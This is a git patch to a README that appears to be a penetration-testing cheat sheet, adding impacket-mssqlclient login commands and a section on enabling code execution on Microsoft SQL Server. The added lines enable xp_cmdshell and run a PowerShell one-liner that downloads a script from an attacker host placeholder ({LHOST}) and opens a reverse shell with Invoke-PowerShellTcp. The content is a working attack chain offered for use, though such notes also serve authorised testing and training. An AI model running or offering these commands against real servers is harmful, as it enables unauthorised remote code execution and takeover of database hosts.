From 1e3248bd279cfc484288c540e722c3f2ea67c900 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Tue, 27 Sep 2022 15:11:31 -0400
Subject: [PATCH] Update README.md

---
 README.md | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/README.md b/README.md
index 7c6003c..efe7b55 100644
--- a/README.md
+++ b/README.md
@@ -594,8 +594,13 @@ nmap -v -p 139, 445 --script=smb-os-discovery {IP ADDRESS}
 
 
 # Impacket-mssqlclient
+impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} 
 impacket-mssqlclient {USERNAME}:'{PASSWORD}'@{IP ADDRESS} -windows-auth
 
+# Enable Code Execution
+SQL> enable_xp_cmdshell
+SQL> EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://{LHOST}/rev.ps1"); Invoke-PowerShellTcp -Reverse -IPAddress {LHOST} -Port {LPORT} | powershell -noprofile'
+
 # Note: Requires credentials
 # {IP ADDRESS}: IP Address of the Server
 # {USERNAME}:   User Authentication